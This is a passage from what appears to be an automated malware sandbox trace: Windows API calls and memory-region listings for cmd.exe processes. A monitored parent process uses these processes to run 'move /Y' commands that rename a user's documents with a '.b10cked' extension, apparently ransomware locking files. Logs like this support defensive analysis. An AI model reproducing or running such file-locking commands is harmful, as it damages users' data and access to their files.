(_String1="move", _String2="KEYS") returned 2 [0141.473] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0141.475] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.475] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.475] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14f7fc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x14f7f4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14f7f4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0141.475] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0141.475] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0141.475] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0141.475] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0141.475] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0141.475] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0141.475] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0141.475] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0141.475] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0141.475] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0141.475] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0141.475] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0141.475] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0141.475] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0141.475] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0141.475] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.475] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.475] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.476] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.476] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.476] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.476] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0141.476] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0141.476] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0141.476] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0141.476] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0141.476] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0141.476] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0141.476] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0141.476] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0141.476] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0141.476] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0141.476] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0141.476] _wcsicmp (_String1="BmSmSSu.doc", _String2=".") returned 52 [0141.476] _wcsicmp (_String1="BmSmSSu.doc", _String2="..") returned 52 [0141.476] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc" (normalized: "c:\\users\\eebsym5\\docume~1\\bmsmssu.doc")) returned 0x20 [0141.476] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x341d38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.476] SetErrorMode (uMode=0x0) returned 0x0 [0141.477] SetErrorMode (uMode=0x1) returned 0x0 [0141.477] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc", nBufferLength=0x104, lpBuffer=0x14f184, lpFilePart=0x14f16c | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc", lpFilePart=0x14f16c*="BmSmSSu.doc") returned 0x25 [0141.477] SetErrorMode (uMode=0x0) returned 0x1 [0141.477] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1" (normalized: "c:\\users\\eebsym5\\docume~1")) returned 0x13 [0141.477] _wcsicmp (_String1="BmSmSSu.doc", _String2=".") returned 52 [0141.477] _wcsicmp (_String1="BmSmSSu.doc", _String2="..") returned 52 [0141.477] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc" (normalized: "c:\\users\\eebsym5\\docume~1\\bmsmssu.doc")) returned 0x20 [0141.477] SetErrorMode (uMode=0x0) returned 0x0 [0141.477] SetErrorMode (uMode=0x1) returned 0x0 [0141.477] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc", nBufferLength=0x104, lpBuffer=0x14f600, lpFilePart=0x14f398 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc", lpFilePart=0x14f398*="BmSmSSu.doc") returned 0x25 [0141.477] SetErrorMode (uMode=0x0) returned 0x1 [0141.477] SetErrorMode (uMode=0x0) returned 0x0 [0141.477] SetErrorMode (uMode=0x1) returned 0x0 [0141.477] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc.b10cked", nBufferLength=0x104, lpBuffer=0x14f808, lpFilePart=0x14f398 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc.b10cked", lpFilePart=0x14f398*="BmSmSSu.doc.b10cked") returned 0x2d [0141.477] SetErrorMode (uMode=0x0) returned 0x1 [0141.477] SetLastError (dwErrCode=0x0) [0141.477] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\bmsmssu.doc.b10cked")) returned 0xffffffff [0141.477] GetLastError () returned 0x2 [0141.477] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc", fInfoLevelId=0x1, lpFindFileData=0x14ed14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ed14) returned 0x330ed0 [0141.478] FindNextFileW (in: hFindFile=0x330ed0, lpFindFileData=0x14ed14 | out: lpFindFileData=0x14ed14) returned 0 [0141.478] GetLastError () returned 0x12 [0141.478] FindClose (in: hFindFile=0x330ed0 | out: hFindFile=0x330ed0) returned 1 [0141.479] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc", fInfoLevelId=0x1, lpFindFileData=0x341ad8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x341ad8) returned 0x330ed0 [0141.479] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc.b10cked", nBufferLength=0x104, lpBuffer=0x14efac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc.b10cked", lpFilePart=0x0) returned 0x2d [0141.479] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc", nBufferLength=0x104, lpBuffer=0x14efac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc", lpFilePart=0x0) returned 0x25 [0141.479] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc" (normalized: "c:\\users\\eebsym5\\docume~1\\bmsmssu.doc")) returned 0x20 [0141.479] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc" (normalized: "c:\\users\\eebsym5\\docume~1\\bmsmssu.doc"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\bmsmssu.doc.b10cked"), dwFlags=0x3) returned 1 [0141.480] FindClose (in: hFindFile=0x330ed0 | out: hFindFile=0x330ed0) returned 1 [0141.480] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x14ef60 | out: _Buffer=" 1") returned 9 [0141.480] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.480] GetFileType (hFile=0x7) returned 0x2 [0142.125] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0142.125] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14eeec | out: lpMode=0x14eeec) returned 1 [0142.126] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.126] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef20 | out: lpConsoleScreenBufferInfo=0x14ef20) returned 1 [0142.126] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0142.126] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x14ef60 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0142.126] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x14ef44, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x14ef44*=0x1a) returned 1 [0142.127] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.127] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0142.127] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.127] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0142.127] _get_osfhandle (_FileHandle=0) returned 0x3 [0142.127] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0142.127] SetConsoleInputExeNameW () returned 0x1 [0142.127] GetConsoleOutputCP () returned 0x1b5 [0142.127] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0142.127] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.128] exit (_Code=0) Process: id = "155" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16900" os_pid = "0xdb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\PWKWXR~1.ODS\" \"C:\\Users\\EEBsYm5\\Desktop\\pWkwXr56WJA6 l5.ods.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14586 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14587 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14588 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14589 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 14590 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14591 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14592 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14593 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14594 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 14595 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15810 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15811 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15812 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15813 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 15814 start_va = 0x350000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 15815 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15816 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15817 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15818 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15819 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15820 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15821 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15822 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15823 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15824 start_va = 0x360000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 15825 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15826 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15827 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 15828 start_va = 0x2d0000 end_va = 0x2d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 15829 start_va = 0x2e0000 end_va = 0x2e0fff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 15830 start_va = 0x2f0000 end_va = 0x2f0fff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 15831 start_va = 0x430000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 15832 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 15833 start_va = 0x1140000 end_va = 0x12a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Thread: id = 212 os_tid = 0xd48 [0140.711] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfb4c | out: lpSystemTimeAsFileTime=0x2cfb4c*(dwLowDateTime=0x8dce28c0, dwHighDateTime=0x1d440a9)) [0140.711] GetCurrentProcessId () returned 0xdb0 [0140.712] GetCurrentThreadId () returned 0xd48 [0140.712] GetTickCount () returned 0x2c293 [0140.712] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfb44 | out: lpPerformanceCount=0x2cfb44*=19750089079) returned 1 [0140.713] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0140.713] __set_app_type (_Type=0x1) [0140.713] __p__fmode () returned 0x76b331f4 [0140.713] __p__commode () returned 0x76b331fc [0140.713] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0140.713] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0140.713] GetCurrentThreadId () returned 0xd48 [0140.713] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd48) returned 0x38 [0140.713] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.713] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0140.713] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.714] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.714] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfadc | out: phkResult=0x2cfadc*=0x0) returned 0x2 [0140.715] VirtualQuery (in: lpAddress=0x2cfb13, lpBuffer=0x2cfaac, dwLength=0x1c | out: lpBuffer=0x2cfaac*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.715] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cfaac, dwLength=0x1c | out: lpBuffer=0x2cfaac*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0140.715] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cfaac, dwLength=0x1c | out: lpBuffer=0x2cfaac*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0140.715] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cfaac, dwLength=0x1c | out: lpBuffer=0x2cfaac*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.715] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cfaac, dwLength=0x1c | out: lpBuffer=0x2cfaac*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0140.715] GetConsoleOutputCP () returned 0x1b5 [0140.715] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.715] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0140.715] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.715] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0140.715] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.715] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.716] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.716] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.716] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.716] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.716] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.716] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0140.716] GetEnvironmentStringsW () returned 0xe0170* [0140.716] FreeEnvironmentStringsW (penv=0xe0170) returned 1 [0140.717] GetEnvironmentStringsW () returned 0xe0170* [0140.717] FreeEnvironmentStringsW (penv=0xe0170) returned 1 [0140.717] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cea4c | out: phkResult=0x2cea4c*=0x40) returned 0x0 [0140.717] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cea54, lpData=0x2cea58, lpcbData=0x2cea50*=0x1000 | out: lpType=0x2cea54*=0x0, lpData=0x2cea58*=0x98, lpcbData=0x2cea50*=0x1000) returned 0x2 [0140.717] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cea54, lpData=0x2cea58, lpcbData=0x2cea50*=0x1000 | out: lpType=0x2cea54*=0x4, lpData=0x2cea58*=0x1, lpcbData=0x2cea50*=0x4) returned 0x0 [0140.717] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2cea54, lpData=0x2cea58, lpcbData=0x2cea50*=0x1000 | out: lpType=0x2cea54*=0x0, lpData=0x2cea58*=0x1, lpcbData=0x2cea50*=0x1000) returned 0x2 [0140.717] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cea54, lpData=0x2cea58, lpcbData=0x2cea50*=0x1000 | out: lpType=0x2cea54*=0x4, lpData=0x2cea58*=0x0, lpcbData=0x2cea50*=0x4) returned 0x0 [0140.717] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cea54, lpData=0x2cea58, lpcbData=0x2cea50*=0x1000 | out: lpType=0x2cea54*=0x4, lpData=0x2cea58*=0x40, lpcbData=0x2cea50*=0x4) returned 0x0 [0140.717] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cea54, lpData=0x2cea58, lpcbData=0x2cea50*=0x1000 | out: lpType=0x2cea54*=0x4, lpData=0x2cea58*=0x40, lpcbData=0x2cea50*=0x4) returned 0x0 [0140.717] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cea54, lpData=0x2cea58, lpcbData=0x2cea50*=0x1000 | out: lpType=0x2cea54*=0x0, lpData=0x2cea58*=0x40, lpcbData=0x2cea50*=0x1000) returned 0x2 [0140.717] RegCloseKey (hKey=0x40) returned 0x0 [0140.717] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cea4c | out: phkResult=0x2cea4c*=0x40) returned 0x0 [0140.717] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cea54, lpData=0x2cea58, lpcbData=0x2cea50*=0x1000 | out: lpType=0x2cea54*=0x0, lpData=0x2cea58*=0x40, lpcbData=0x2cea50*=0x1000) returned 0x2 [0140.717] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cea54, lpData=0x2cea58, lpcbData=0x2cea50*=0x1000 | out: lpType=0x2cea54*=0x4, lpData=0x2cea58*=0x1, lpcbData=0x2cea50*=0x4) returned 0x0 [0140.717] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2cea54, lpData=0x2cea58, lpcbData=0x2cea50*=0x1000 | out: lpType=0x2cea54*=0x0, lpData=0x2cea58*=0x1, lpcbData=0x2cea50*=0x1000) returned 0x2 [0140.717] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cea54, lpData=0x2cea58, lpcbData=0x2cea50*=0x1000 | out: lpType=0x2cea54*=0x4, lpData=0x2cea58*=0x0, lpcbData=0x2cea50*=0x4) returned 0x0 [0140.717] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cea54, lpData=0x2cea58, lpcbData=0x2cea50*=0x1000 | out: lpType=0x2cea54*=0x4, lpData=0x2cea58*=0x9, lpcbData=0x2cea50*=0x4) returned 0x0 [0140.717] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cea54, lpData=0x2cea58, lpcbData=0x2cea50*=0x1000 | out: lpType=0x2cea54*=0x4, lpData=0x2cea58*=0x9, lpcbData=0x2cea50*=0x4) returned 0x0 [0140.717] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cea54, lpData=0x2cea58, lpcbData=0x2cea50*=0x1000 | out: lpType=0x2cea54*=0x0, lpData=0x2cea58*=0x9, lpcbData=0x2cea50*=0x1000) returned 0x2 [0140.718] RegCloseKey (hKey=0x40) returned 0x0 [0140.718] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636f [0140.718] srand (_Seed=0x5b88636f) [0140.718] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\PWKWXR~1.ODS\" \"C:\\Users\\EEBsYm5\\Desktop\\pWkwXr56WJA6 l5.ods.b10cked\"" [0140.718] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\PWKWXR~1.ODS\" \"C:\\Users\\EEBsYm5\\Desktop\\pWkwXr56WJA6 l5.ods.b10cked\"" [0140.718] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.718] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xe18d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0140.718] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 